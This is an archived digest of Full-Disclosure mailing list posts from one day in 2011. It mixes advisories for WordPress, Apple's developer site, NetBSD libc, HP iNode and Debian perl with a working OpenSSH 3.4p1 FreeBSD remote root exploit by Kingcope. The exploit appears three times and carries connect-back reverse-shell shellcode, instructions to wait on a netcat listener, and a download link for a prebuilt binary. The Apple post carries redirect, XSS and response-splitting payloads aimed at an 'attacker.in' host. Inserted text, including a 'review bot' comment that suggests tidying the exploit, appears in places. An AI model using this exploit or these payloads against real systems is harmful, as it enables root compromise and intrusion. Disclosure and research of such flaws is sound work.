Re: [Full-disclosure] OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

2011-07-01 Thread Darren Tucker
This seems to be in libopie rather than sshd or libpam and happens
when the username is longer than OPIE_PRINCIPAL_MAX.  I'm not sure
exactly where inside libopie it is, but commenting out pam_opie.so
seems to prevent it.

http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/pam_opie.c?annotate=1.26
prevents usernames longer than OPIE_PRINCIPAL_MAX from being accepted
by pam_opie.

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4  37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [Spanish] Free course: Linux exploit development - ASCII Armor Bypass Return-To-PLT

2011-07-01 Thread Pavel Carrillo
+1
  I would go, but I am from Mexico and it is hard for me to travel to
Argentina for one talk; it would be excellent if you recorded it and shared it.

On 29/06/11 12:38, Jonas Andradas wrote:
 2011/6/29 runlvl run...@gmail.com
 
 This Saturday, 2 July, at 11:00 the free 3-hour course on information
 security will be given at Castro Barros 183 1-5 (Argentina).
 
 
 It will be impossible for me to attend on Saturday. Will the course be
 recorded so it can be downloaded afterwards? Will the material be posted
 somewhere?
 
 Regards,
 
 -- 
 Jonás Andradas
 
 Skype: jontux
 LinkedIn: http://www.linkedin.com/in/andradas
 GPG Fingerprint:  678F 7BD0 83C3 28CE 9E8F 3F7F 4D87 9996 E0C6 9372
 Keyservers:  pgp.mit.edu | pgp.rediris.es
 
 
 
attachment: pavel_carrilloj.vcf

[Full-disclosure] SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress

2011-07-01 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
===
              title: Multiple SQL Injection Vulnerabilities
            product: WordPress
 vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
      fixed version: 3.1.4/3.2-RC3
             impact: Medium
           homepage: http://wordpress.org/
              found: 2011-06-21
                 by: K. Gudinavicius
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
===

Vendor description:
---
WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001.

Source: http://wordpress.org/about/



Vulnerability overview/description:
---
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the Editor role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.



Proof of concept:
-
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input, allowing an attacker with
Editor privileges to inject arbitrary SQL commands in the orderby
and order parameters passed as array members to the vulnerable filter
when sorting, for example, link categories.

The following URLs could be used to perform blind SQL injection
attacks:

http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL injection]&order=[SQL injection]


2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with Editor privileges to inject arbitrary SQL
commands in the orderby and order parameters passed as array
members to the vulnerable function when sorting links.

The following URL could be used to perform blind SQL injection attacks:

http://localhost/wp-admin/link-manager.php?orderby=[SQL injection]&order=[SQL injection]


Vulnerable / tested versions:
-
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.


Vendor contact timeline:

2011-06-22: Contacting vendor through secur...@wordpress.org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory



Solution:
-
Upgrade to version 3.1.4 or 3.2-RC3


Workaround:
---
A more restrictive role, e.g. Author, could be applied to the user.



Advisory URL:
-
https://www.sec-consult.com/en/advisories.html


~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius / @2011



[Full-disclosure] Vulnerabilities in developer.apple.com

2011-07-01 Thread YGN Ethical Hacker Group
Vulnerabilities via URL Redirector in developer.apple.com



1. VULNERABILITY DESCRIPTION

Arbitrary URL Redirect
==

POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page

Issue References:
OWASP Top 10 A10 -
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 -  http://cwe.mitre.org/data/definitions/601.html


Cross Site Scripting(XSS) Via Arbitrary URL Redirect


POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D

Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html


HTTP Response Splitting(HRS) Via Arbitrary URL Redirect


https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--

Issue References:
CWE 113 - http://cwe.mitre.org/data/definitions/113.html


Demo:
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/


2. VENDOR

Apple Inc
http://www.apple.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-25: reported to vendor
2011-04-27: vendor replied "Thank you for forwarding this issue to us.
We take any report of a potential security issue very seriously."
2011-06-29: vendor replied that the vulnerability was fixed
2011-07-01: vulnerability was disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs


#yehg [2011-07-01]



[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow

2011-07-01 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/

Date:
- Dis.: 01.04.2011
- Pub.: 01.07.2011

CVE: CVE-2011-1656
CWE: CWE-121

Affected software:
- NetBSD 5.1 (fixed)

Affected functions:
- getservbyname(3)
- getservbyname_r(3)
- getservbyport(3)
- getservbyport_r(3)
- getaddrinfo(3)
- getnameinfo(3)

Original URL:
http://securityreason.com/achievement_securityalert/99


--- 0. Description ---
The getservbyname(), and getservbyport() functions each return a pointer
to an object with the following structure containing the broken-out
fields of a line in the network services data base,

 struct servent *
 getservbyname(const char *name, const char *proto);

 struct servent *
 getservbyport(int port, const char *proto);

The getservbyname() and getservbyport() functions sequentially search
from the beginning of the file until a matching protocol name or port
number is found, or until EOF is encountered.  If a protocol name is
also supplied (non-NULL), searches must also match the protocol.


--- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files like getservbyname_r.c and
getservbyport_r.c. The getservbyname*(3), getservbyport*(3) and
getaddrinfo(3) functions of the NetBSD libc implementation allow a
possible buffer overflow. To demonstrate this issue, we may use PHP as an
attack vector.

127# php -r 'getservbyname("A",str_repeat("A",7108));'
127# php -r 'getservbyname("A",str_repeat("A",7109));'
Memory fault (core dumped)

-php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
	char *name, *proto;
	int name_len, proto_len;
	struct servent *serv;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &name,
	    &name_len, &proto, &proto_len) == FAILURE) {
		return;
	}
	...
	serv = getservbyname(name, proto);	/* <=== CALL TO LIBC */
-php-5.3.6/ext/standard/basic_functions.c---

BT:
#0  0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12
#1  0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12
#2  0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12
#3  0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12
#4  0xbb822f6f in getservbyname () from /usr/lib/libc.so.12
#5  0x08334458 in php_get_highlight_struct ()

Let's see what is wrong with getservbyname().

-getservbyname.c---
struct servent *
getservbyname(const char *name, const char *proto)
{
	struct servent *s;

	mutex_lock(&_servent_mutex);
	s = getservbyname_r(name, proto, &_servent_data.serv, &_servent_data);
	/* <=== REFERENCE */
	mutex_unlock(&_servent_mutex);
	return (s);
}
-getservbyname.c---

As we can see, getservbyname(3) redirects to the getservbyname_r(3) function.

-getservbyname_r.c---
	if (sd->flags & _SV_DB) {
		char buf[BUFSIZ];
		DBT key, data;
		DB *db = sd->db;
		key.data = buf;

		if (proto == NULL)
			key.size = snprintf(buf, sizeof(buf), "\376%s", name);
			/* <=== INVALID key.size HERE */
		else
			key.size = snprintf(buf, sizeof(buf), "\376%s/%s",
			    name, proto);
			/* <=== INVALID key.size HERE */
		key.size++;

		if ((*db->get)(db, &key, &data, 0) != 0)
			return NULL;

		if ((*db->get)(db, &data, &key, 0) != 0)
			return NULL;
-getservbyname_r.c---

key.size may be bigger than BUFSIZ.

snprintf(3) returns the number of characters that would have been written
had size been sufficiently large (not counting the terminating null). In
this case, snprintf(3) returns a value bigger than sizeof(buf). In older
libc implementations, snprintf(3) would return -1 if the string is truncated.
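The snprintf(3) return-value pitfall described above, as an added example that is not part of the original advisory or of NetBSD's code: unchecked_key_size() reproduces the key-length computation from the quoted getservbyname_r() fragment, and checked_key_size() is a hardened variant (written for this example, not the NetBSD fix) that refuses any result that did not fit in the buffer. BUFSIZ is replaced by a constructed 64-byte buffer so the mismatch is visible with a short input, and the function names and sample strings are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for BUFSIZ so the mismatch shows with short input. */
#define KEYBUF_SIZE 64

/* Same computation as the quoted getservbyname_r() fragment: the
 * snprintf() return value is taken as the key length and incremented,
 * with no check that it fits in buf.  The value returned here is what
 * the db lookup would be handed as key.size. */
size_t unchecked_key_size(char *buf, size_t bufsz,
                          const char *name, const char *proto)
{
    int n;
    if (proto == NULL)
        n = snprintf(buf, bufsz, "\376%s", name);
    else
        n = snprintf(buf, bufsz, "\376%s/%s", name, proto);
    return (size_t)n + 1;            /* key.size++ in the original */
}

/* Hardened variant (this example's, not the NetBSD fix): a negative
 * return or one >= bufsz means the key was truncated, so refuse the
 * lookup instead of passing a length larger than the buffer. */
int checked_key_size(char *buf, size_t bufsz,
                     const char *name, const char *proto, size_t *out)
{
    int n;
    if (proto == NULL)
        n = snprintf(buf, bufsz, "\376%s", name);
    else
        n = snprintf(buf, bufsz, "\376%s/%s", name, proto);
    if (n < 0 || (size_t)n >= bufsz)
        return -1;
    *out = (size_t)n + 1;            /* key plus its terminating NUL */
    return 0;
}

/* Builds a constructed oversized protocol string, in the spirit of the
 * PHP str_repeat("A", ...) call in the advisory but much shorter. */
static void long_proto(char *dst, size_t len)
{
    memset(dst, 'A', len - 1);
    dst[len - 1] = '\0';
}

/* Oversized input: the unchecked path reports 1 + 1 + 1 + 199 + 1 = 203
 * bytes as key.size for a 64-byte buffer. */
size_t demo_unchecked_long(void)
{
    char buf[KEYBUF_SIZE], proto[200];
    long_proto(proto, sizeof(proto));
    return unchecked_key_size(buf, sizeof(buf), "A", proto);
}

/* Same input through the checked path: rejected with -1. */
int demo_checked_long(void)
{
    char buf[KEYBUF_SIZE], proto[200];
    size_t sz;
    long_proto(proto, sizeof(proto));
    return checked_key_size(buf, sizeof(buf), "A", proto, &sz);
}

/* Well-formed input ("ssh"/"tcp"): the checked path accepts 9 bytes,
 * the same value the unchecked path computes. */
size_t demo_checked_short(void)
{
    char buf[KEYBUF_SIZE];
    size_t sz = 0;
    if (checked_key_size(buf, sizeof(buf), "ssh", "tcp", &sz) != 0)
        return 0;
    return sz;
}

int main(void)
{
    printf("oversized proto: unchecked key.size=%zu for a %d-byte buffer, "
           "checked rc=%d\n", demo_unchecked_long(), KEYBUF_SIZE,
           demo_checked_long());
    printf("ssh/tcp: checked key.size=%zu\n", demo_checked_short());
    return 0;
}
```

The point the example isolates is that the length handed downstream comes from snprintf(3)'s return value, not from what actually landed in the buffer; on any libc that follows C99 semantics the two diverge as soon as the input is longer than the buffer, which is exactly the condition the PHP one-liners above trigger.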

The same problem is with getservbyport_r(3).

-getservbyport_r.c---
	if (sd->flags & _SV_DB) {
		char buf[BUFSIZ];
		DBT key, data;
		DB *db = sd->db;
		key.data = buf;

		port = htons(port);
		if (proto == NULL)
			key.size = snprintf(buf, sizeof(buf), "\377%d", port);
			/* <=== INVALID key.size HERE */
		else
			key.size = snprintf(buf, sizeof(buf), "\377%d/%s",
			    port, proto);
			/* <=== INVALID key.size HERE */
		key.size++;

		if ((*db->get)(db, &key, &data, 0) != 0)
			return NULL;

		if ((*db->get)(db, &data, &key, 0) != 0)
			return NULL;
-getservbyport_r.c---

And the last PoC:
-PoC---
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#


*/
#include <stdlib.h>
#include <string.h>
#include 

Re: [Full-disclosure] S3cC0n Security Conference

2011-07-01 Thread s3cc0n Conference
S3cC0n Security Conference Schedule


http://dl.dropbox.com/u/18007092/S3cC0n_Schedule.pdf



On Wed, Jun 29, 2011 at 3:17 PM, secc0n Conference s3c...@gmail.com wrote:


 Dear Security researchers,
 S3cC0n, an Indian internet security researcher team, invites you to join
 us on the 7th, 8th, and 9th of July for the annual disclosure of exploits and
 security research. For the last 2 years we have been organizing this conference with 56
 researchers. S3cC0n is proud to announce the launch of its security and
 hacking conference in INDIA. This conference will bring together security
 researchers, security professionals, vendors and law enforcement agencies
 from all over the country on a common platform to discuss the latest research in
 the field of information security and in particular the major security threats
 faced by everyone today.
 S3cC0n is a one-of-a-kind conference showcasing the latest research and
 trends in information security by renowned security
 researchers/professionals.
 The following topics are covered:
 Web application – Security is not separate
 Cross interface attack (CIA)
 Web Trend – Exploited browser
 SQLXSS (SQL Injections XSS)
 Remote Code execution in Dev
 Document rendering attack
 XML authoring flow
 WAF Bypass Methods
 Web Widget interface flaw
 Persistent Redirection flaw
 Declarative security
 Content Delivery networks – Stringency
 Many more private 0days will be disclosed at the conference...
 Topic information with the schedule of discussion topics and author names will
 be displayed soon.

 For more details please send mail to s3c...@gmail.com

 Best Regards,

 S3cC0n Team

 Download PDF :
 http://dl.dropbox.com/u/18007092/Dear_Security_researchers.pdf


[Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-01 Thread HI-TECH .
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z yourip target
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.

the statically linked binary can be downloaded from
http://isowarez.de/ssh_0day

I know these versions are really old; some seem to run
that, though.

-Cheers, King the archaeologist Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
 char *myip;
195a197,203
 OpenSSH FreeBSD Remote Root Exploit\n
 By Kingcope\n
 Year 2011\n\n
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n
 run like ./ssh -1 -z yourip target\n
 setup a netcat, port 443 on yourip first\n\n
299c307
   while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx
---
   while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx
335a344,346
   break;
   case 'z':
   myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
 //IP=\xc0\xa8\x20\x80
 #define   IPADDR  \xc0\xa8\x20\x80
 #define PORT  \x27\x10  /* htons(1) */

 char sc[] =
\x90\x90
\x90\x90
\x31\xc9 // xorecx, ecx
\xf7\xe1 // mulecx
\x51 // push   ecx
\x41 // incecx
\x51 // push   ecx
\x41 // incecx
\x51 // push   ecx
\x51 // push   ecx
\xb0\x61 // moval, 97
\xcd\x80 // int80h
\x89\xc3 // movebx, eax
\x68IPADDR   // push   dword 0101017fh
\x66\x68PORT // push   word 4135
\x66\x51 // push   cx
\x89\xe6 // movesi, esp
\xb2\x10 // movdl, 16
\x52 // push   edx
\x56 // push   esi
\x50 // push   eax
\x50 // push   eax
\xb0\x62 // moval, 98
\xcd\x80 // int80h
\x41 // incecx
\xb0\x5a // moval, 90
\x49 // dececx
\x51 // push   ecx
\x53 // push   ebx
\x53 // push   ebx
\xcd\x80 // int80h
\x41 // incecx
\xe2\xf5 // loop   -10
\x51 // push   ecx
\x68\x2f\x2f\x73\x68 // push   dword 68732f2fh
\x68\x2f\x62\x69\x6e // push   dword 6e69622fh
\x89\xe3 // movebx, esp
\x51 // push   ecx
\x54 // push   esp
\x53 // push   ebx
\x53 // push   ebx
\xb0\xc4\x34\xff
\xcd\x80;// int80h


 extern char *myip;

678a731,748

   char buffer[10];

   printf(OpenSSH Remote Root Exploit\n);
   printf(By Kingcope\n);
   printf(Year 2011\n\n);
   printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n);
   printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n);
   printf(Connect back to: %s:443\n, myip);

   *((unsigned long*)(sc + 21)) = inet_addr(myip);
   *((unsigned short*)(sc + 27)) = htons(443);

   memset(buffer, 'V', 8096);
   memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1 
 FreeBSD-20020702
   memset(buffer+28, '\x90', 65535);
   memcpy(buffer+28+65535, sc, sizeof(sc));
   server_user=buffer;
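Review bot: the 678a731,748 hunk documents no triggering condition or root cause, only the two banner strings in the `Unlocks ...` printf lines, so a reader cannot tell from the patch which server-side component is affected or what to change to mitigate it; Darren Tucker's reply in this digest (on the 3.5p1 variant) attributes the crash to libopie via pam_opie when the username is longer than OPIE_PRINCIPAL_MAX, and that is the detail that belongs in the header comment next to the banners. The `PORT` define in the previous hunk also carries the comment `/* htons(1) */`, which does not describe its value, and both `IPADDR` and `PORT` are rewritten at runtime by `*((unsigned long*)(sc + 21)) = inet_addr(myip);` and `*((unsigned short*)(sc + 27)) = htons(443);`, so the defines and the stale `push dword 0101017fh` / `push word 4135` comments should be marked as placeholders rather than as the values actually used.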



Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-01 Thread HI-TECH .
you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji m...@b3nji.com:
 So you want people to download your statically linked binary?

 On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
 isowarez.isowarez.isowa...@googlemail.com wrote:

 OpenSSH FreeBSD Remote Root Exploit
 By Kingcope
 Year 2011

 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
 run like ./ssh -1 -z yourip target
 setup a netcat, port 443 on yourip first

 a statically linked linux binary of the exploit can be found below
 attached is a diff to openssh-5.8p2.

 the statically linked binary can be downloaded from
 http://isowarez.de/ssh_0day

 I know these versions are really old; some seem to run
 that, though.

 -Cheers, King the archaeologist Cope

 diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
 149a150
  char *myip;
 195a197,203
  OpenSSH FreeBSD Remote Root Exploit\n
  By Kingcope\n
  Year 2011\n\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n
  run like ./ssh -1 -z yourip target\n
  setup a netcat, port 443 on yourip first\n\n
 299c307
        while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx
 ---
        while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx
 335a344,346
                        break;
                case 'z':
                        myip = optarg;
 diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
 667a668,719
  //IP=\xc0\xa8\x20\x80
  #define       IPADDR  \xc0\xa8\x20\x80
  #define PORT  \x27\x10              /* htons(1) */
 
  char sc[] =
     \x90\x90
     \x90\x90
     \x31\xc9                 // xor    ecx, ecx
     \xf7\xe1                 // mul    ecx
     \x51                     // push   ecx
     \x41                     // inc    ecx
     \x51                     // push   ecx
     \x41                     // inc    ecx
     \x51                     // push   ecx
     \x51                     // push   ecx
     \xb0\x61                 // mov    al, 97
     \xcd\x80                 // int    80h
     \x89\xc3                 // mov    ebx, eax
     \x68IPADDR                       // push   dword 0101017fh
     \x66\x68PORT             // push   word 4135
     \x66\x51                 // push   cx
     \x89\xe6                 // mov    esi, esp
     \xb2\x10                 // mov    dl, 16
     \x52                     // push   edx
     \x56                     // push   esi
     \x50                     // push   eax
     \x50                     // push   eax
     \xb0\x62                 // mov    al, 98
     \xcd\x80                 // int    80h
     \x41                     // inc    ecx
     \xb0\x5a                 // mov    al, 90
     \x49                     // dec    ecx
     \x51                     // push   ecx
     \x53                     // push   ebx
     \x53                     // push   ebx
     \xcd\x80                 // int    80h
     \x41                     // inc    ecx
     \xe2\xf5                 // loop   -10
     \x51                     // push   ecx
     \x68\x2f\x2f\x73\x68     // push   dword 68732f2fh
     \x68\x2f\x62\x69\x6e     // push   dword 6e69622fh
     \x89\xe3                 // mov    ebx, esp
     \x51                     // push   ecx
     \x54                     // push   esp
     \x53                     // push   ebx
     \x53                     // push   ebx
     \xb0\xc4\x34\xff
     \xcd\x80;                // int    80h
 
 
  extern char *myip;
 
 678a731,748
 
        char buffer[10];
 
        printf(OpenSSH Remote Root Exploit\n);
        printf(By Kingcope\n);
        printf(Year 2011\n\n);
        printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n);
        printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n);
        printf(Connect back to: %s:443\n, myip);
 
        *((unsigned long*)(sc + 21)) = inet_addr(myip);
        *((unsigned short*)(sc + 27)) = htons(443);
 
        memset(buffer, 'V', 8096);
        memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); //
  SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
        memset(buffer+28, '\x90', 65535);
        memcpy(buffer+28+65535, sc, sizeof(sc));
        server_user=buffer;



Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-01 Thread Benji
So you want people to download your statically linked binary?

On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . 
isowarez.isowarez.isowa...@googlemail.com wrote:

 OpenSSH FreeBSD Remote Root Exploit
 By Kingcope
 Year 2011

 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
 run like ./ssh -1 -z yourip target
 setup a netcat, port 443 on yourip first

 a statically linked linux binary of the exploit can be found below
 attached is a diff to openssh-5.8p2.

 the statically linked binary can be downloaded from
 http://isowarez.de/ssh_0day

 I know these versions are really old; some seem to run
 that, though.

 -Cheers, King the archaeologist Cope

 diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
 149a150
  char *myip;
 195a197,203
  OpenSSH FreeBSD Remote Root Exploit\n
  By Kingcope\n
  Year 2011\n\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n
  run like ./ssh -1 -z yourip target\n
  setup a netcat, port 443 on yourip first\n\n
 299c307
while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx
 ---
while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx
 335a344,346
break;
case 'z':
myip = optarg;
 diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
 667a668,719
  //IP=\xc0\xa8\x20\x80
  #define   IPADDR  \xc0\xa8\x20\x80
  #define PORT  \x27\x10  /* htons(1) */
 
  char sc[] =
 \x90\x90
 \x90\x90
 \x31\xc9 // xorecx, ecx
 \xf7\xe1 // mulecx
 \x51 // push   ecx
 \x41 // incecx
 \x51 // push   ecx
 \x41 // incecx
 \x51 // push   ecx
 \x51 // push   ecx
 \xb0\x61 // moval, 97
 \xcd\x80 // int80h
 \x89\xc3 // movebx, eax
 \x68IPADDR   // push   dword 0101017fh
 \x66\x68PORT // push   word 4135
 \x66\x51 // push   cx
 \x89\xe6 // movesi, esp
 \xb2\x10 // movdl, 16
 \x52 // push   edx
 \x56 // push   esi
 \x50 // push   eax
 \x50 // push   eax
 \xb0\x62 // moval, 98
 \xcd\x80 // int80h
 \x41 // incecx
 \xb0\x5a // moval, 90
 \x49 // dececx
 \x51 // push   ecx
 \x53 // push   ebx
 \x53 // push   ebx
 \xcd\x80 // int80h
 \x41 // incecx
 \xe2\xf5 // loop   -10
 \x51 // push   ecx
 \x68\x2f\x2f\x73\x68 // push   dword 68732f2fh
 \x68\x2f\x62\x69\x6e // push   dword 6e69622fh
 \x89\xe3 // movebx, esp
 \x51 // push   ecx
 \x54 // push   esp
 \x53 // push   ebx
 \x53 // push   ebx
 \xb0\xc4\x34\xff
 \xcd\x80;// int80h
 
 
  extern char *myip;
 
 678a731,748
 
char buffer[10];
 
printf(OpenSSH Remote Root Exploit\n);
printf(By Kingcope\n);
printf(Year 2011\n\n);
printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n);
printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n);
printf(Connect back to: %s:443\n, myip);
 
*((unsigned long*)(sc + 21)) = inet_addr(myip);
*((unsigned short*)(sc + 27)) = htons(443);
 
memset(buffer, 'V', 8096);
memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1
 FreeBSD-20020702
memset(buffer+28, '\x90', 65535);
memcpy(buffer+28+65535, sc, sizeof(sc));
server_user=buffer;


[Full-disclosure] ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability

2011-07-01 Thread ZDI Disclosures
ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-232

July 1, 2011

-- CVE ID:
CVE-2011-1867

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard iNode Management Center

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11239. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of HP H3C/3Com iNode Management Center.
Authentication is not required to exploit this vulnerability. 

The flaw exists within the iNodeMngChecker.exe component which listens
by default on TCP port 9090. When handling the 0x0A0BF007 packet type
the process blindly copies user supplied data into a fixed-length buffer
on the stack. A remote attacker can exploit this vulnerability to
execute arbitrary code under the context of the SYSTEM user.

-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775

-- Disclosure Timeline:
2011-01-21 - Vulnerability reported to vendor
2011-07-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Luigi Auriemma

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] [SECURITY] [DSA 2267-1] perl security update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2267-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: perl
Vulnerability  : restriction bypass
Problem type   : local
Debian-specific: no
